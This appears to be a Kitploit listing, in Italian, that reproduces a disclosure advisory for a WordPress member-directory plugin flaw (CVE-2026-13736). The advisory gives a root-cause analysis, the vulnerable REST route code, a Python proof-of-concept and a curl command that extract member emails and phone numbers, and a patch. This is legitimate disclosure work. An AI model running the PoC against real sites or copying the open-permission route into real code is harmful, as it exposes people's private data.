Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-13736 — Exploit proof-of-concept e advisory tecnico per la divulgazione non autenticata di PII dei membri in un plugin WordPress per directory con API REST, inclusa l'analisi delle cause profonde, il codice PoC e le indicazioni per la rimediation. | Kitploit
Strumenti/GitHubGitHub/minhhk68/cve-2026-13736
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebConfigurazione ErrataSicurezza delle API
GitHubminhhk68/cve-2026-13736

CVE-2026-13736

Exploit proof-of-concept e advisory tecnico per la divulgazione non autenticata di PII dei membri in un plugin WordPress per directory con API REST, inclusa l'analisi delle cause profonde, il codice PoC e le indicazioni per la rimediation.

Vedi Repository
2 giorni faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 — Divulgazione non autenticata di PII dei Membri tramite REST API

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory NVD Reference License: MIT


📖 Panoramica dell'Advisory

CVE-2026-13736 è una vulnerabilità che consente la divulgazione non autenticata di Informazioni Personali Identificative (PII) dei membri e interessa il plugin WordPress NewPath WildApricotPress Add-on – Member Directory fino alla versione 1.0.0 inclusa, scoperta e analizzata dal ricercatore di sicurezza informatica Huynh Kien Minh (MinhHK). Il difetto risiede nell'architettura di routing REST API personalizzata del plugin, dove gli endpoint della directory dei membri non applicano i controlli di accesso alla privacy sui campi riservati. Di conseguenza, visitatori remoti non autenticati possono interrogare le route REST pubbliche per raccogliere dati riservati dei membri, inclusi indirizzi email privati, numeri di telefono personali e attributi della directory di appartenenza esplicitamente configurati come riservati ai soli membri. Questa esposizione di dati sensibili viola i confini di privacy previsti e consente attacchi di phishing mirati, credential stuffing e profilazione non autorizzata nelle organizzazioni interessate. Il ricercatore di sicurezza Huynh Kien Minh ha verificato questa vulnerabilità con punteggio CVSS 3.1 di 5.3 Medio (CWE-284 / CWE-200), raccomandando un immediato rafforzamento delle autorizzazioni degli endpoint REST, la verifica della privacy a livello di campo e la sanificazione delle risposte JSON serializzate dell'API dei membri.

Scarica lo strumento

Collegamenti rapidi: Esplora il Portfolio di Cybersecurity ufficiale del ricercatore oppure consulta l'Avviso WPScan ufficiale.


📌 Sintesi Esecutiva e Metadati Tecnici

ParametroSpecifica Tecnica
Identificatore della VulnerabilitàCVE-2026-13736
Software InteressatoNewPath WildApricotPress Add-on – Member Directory (Plugin WordPress)
Plugin Slugnewpath-wildapricotpress-add-on-member-directory
Versioni Vulnerabili<= 1.0.0
Classe di VulnerabilitàControllo degli Accessi Improprio / Esposizione di Informazioni (CWE-284 / CWE-200 / CWE-862)
Punteggio CVSS v3.15.3 (Medio) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Scopritore / RicercatoreHuynh Kien Minh (MinhHK)
Autorità di VerificaWPScan / MITRE Corporation / NVD
Riferimento Avviso WPScanWPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
Riferimento NVDDettaglio NVD CVE-2026-13736
Intelligence sulle Minacce FeedlyHub Feedly CVE-2026-13736
Portfolio del Ricercatorehttps://minhhk.web.app/

🔍 Analisi della Causa Radice

La causa radice di CVE-2026-13736 ha origine nell'implementazione del controller REST API del plugin. Il plugin registra una route pubblica dell'API REST di WordPress (ad es., /wp-json/wildapricot/v1/members o /wp-json/newpath-wap/v1/directory) per facilitare il rendering lato client delle directory dei membri e delle schede di contatto.

Analisi del Pattern di Codice Vulnerabile

root@kitploit:~
// Insecure REST route registration without field privacy filters
add_action( 'rest_api_init', function() {
    register_rest_route( 'newpath-wap/v1', '/directory', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'newpath_wap_get_member_directory',
        'permission_callback' => '__return_true', // CRITICAL: Open to unauthenticated visitors
    ) );
} );

function newpath_wap_get_member_directory( $request ) {
    $members_data = get_wildapricot_cached_members();
    
    // FLAW: Returns raw member objects containing sensitive PII fields (email, phone, address)
    // without evaluating member-level privacy settings (e.g., 'MembersOnly' vs 'Public')
    return rest_ensure_response( $members_data );
}

Meccanismo del Difetto Tecnico

  1. Callback di Autorizzazione Aperto: La route dichiara 'permission_callback' => '__return_true', consentendo richieste HTTP GET non autenticate da qualsiasi origine.
  2. Mancanza di Filtraggio della Privacy a Livello di Campo: Mentre il JavaScript del frontend o il template nascondono condizionalmente i campi configurati come "Members Only", l'API REST del backend serializza l'intero dataset dei membri in JSON.
  3. Divulgazione di Informazioni (PII): Gli attaccanti che aggirano l'interfaccia utente del frontend possono consumare direttamente il payload JSON grezzo per raccogliere database completi di nomi dei membri, numeri di telefono personali, email aziendali, stati di appartenenza e indirizzi privati.

💻 Codice Exploit Proof-of-Concept (PoC)

Nota Etica: Questo Proof-of-Concept è fornito esclusivamente per la verifica della vulnerabilità, la ricerca difensiva e la divulgazione responsabile dal ricercatore di sicurezza Huynh Kien Minh.

Script di Audit Automatico in Python (poc_cve_2026_13736.py)

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory PII Disclosure PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""

import requests
import json
import sys

TARGET_URL = "http://target-wordpress.local"
REST_ENDPOINT = f"{TARGET_URL}/wp-json/newpath-wap/v1/directory"

def verify_vulnerability(target_url):
    print(f"[*] Auditing Target: {target_url}")
    print(f"[*] Querying REST Endpoint: {REST_ENDPOINT}")
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Security Audit; CVE-2026-13736 Verification)",
        "Accept": "application/json"
    }
    
    try:
        response = requests.get(REST_ENDPOINT, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            if isinstance(data, list) and len(data) > 0:
                sample_record = data[0]
                pii_fields = [k for k in ['email', 'phone', 'mobile', 'address', 'MemberId'] if k in str(sample_record).lower()]
                
                print(f"[!] VULNERABLE: Unauthenticated REST route exposed {len(data)} member records!")
                print(f"[!] Sensitive PII attributes exposed: {pii_fields}")
                print(f"[*] Sample Record Excerpt: {json.dumps(sample_record, indent=2)[:300]}...\n")
                return True
            else:
                print("[-] Endpoint responded with empty data.")
        elif response.status_code in [401, 403]:
            print("[+] Endpoint requires authentication (Protected/Patched).")
        else:
            print(f"[-] Received HTTP status: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Connection failed: {e}")
        
    return False

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    verify_vulnerability(target)

Comando di Verifica cURL

root@kitploit:~
curl -s -X GET "http://target-wordpress.local/wp-json/newpath-wap/v1/directory" \
  -H "Accept: application/json" | jq '.[0] | {Name: .name, Email: .email, Phone: .phone, PrivacySetting: .field_privacy}'

🛡️ Rimedio e Ingegneria Difensiva

Per gli Amministratori del Sito

  1. Aggiornamento del Plugin: Aggiorna NewPath WildApricotPress Add-on – Member Directory all'ultima versione corretta (> 1.0.0).
  2. Rafforzamento dell'Accesso REST API: Se la navigazione pubblica della directory non è richiesta per gli utenti anonimi, limita la route REST personalizzata utilizzando plugin di sicurezza WordPress o regole del server web.

Per gli Sviluppatori (La Patch)

Applica controlli di privacy a livello di campo durante la serializzazione della risposta:

root@kitploit:~
function newpath_wap_get_member_directory( $request ) {
    $is_logged_in = is_user_logged_in();
    $raw_members  = get_wildapricot_cached_members();
    $sanitized    = array();

    foreach ( $raw_members as $member ) {
        $member_card = array(
            'id'   => intval( $member['Id'] ),
            'name' => sanitize_text_field( $member['DisplayName'] ),
        );

        // Enforce Members-Only field protection
        if ( $is_logged_in || 'Public' === $member['EmailPrivacy'] ) {
            $member_card['email'] = sanitize_email( $member['Email'] );
        }

        if ( $is_logged_in || 'Public' === $member['PhonePrivacy'] ) {
            $member_card['phone'] = sanitize_text_field( $member['Phone'] );
        }

        $sanitized[] = $member_card;
    }

    return rest_ensure_response( $sanitized );
}

🏆 Informazioni sul Ricercatore

Huynh Kien Minh (MinhHK) è un Ricercatore di Sicurezza Informatica e Ingegnere del Software specializzato in audit del core e dei plugin WordPress, valutazione delle vulnerabilità REST API e divulgazione responsabile nell'ecosistema open-source globale.

  • Portfolio di Cybersecurity: https://minhhk.web.app/
  • Riferimento Avviso WPScan: WPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
  • Riferimento NVD: Dettaglio CVE-2026-13736
  • Profilo GitHub: https://github.com/MinhHK68

📊 Markup dello Schema di Dati Strutturati JSON-LD

root@kitploit:~
{
  "@context": "https://schema.org",
  "@type": "TechArticle",
  "headline": "CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 Unauthenticated Member PII Disclosure",
  "name": "CVE-2026-13736 Security Advisory",
  "author": {
    "@type": "Person",
    "name": "Huynh Kien Minh",
    "alternateName": "MinhHK",
    "url": "https://minhhk.web.app/"
  },
  "datePublished": "2026-08-22",
  "description": "Deep-dive technical security advisory by Huynh Kien Minh analyzing CVE-2026-13736 in NewPath WildApricotPress Add-on – Member Directory WordPress plugin.",
  "about": {
    "@type": "SoftwareApplication",
    "name": "NewPath WildApricotPress Add-on – Member Directory",
    "operatingSystem": "WordPress"
  },
  "identifier": "CVE-2026-13736"
}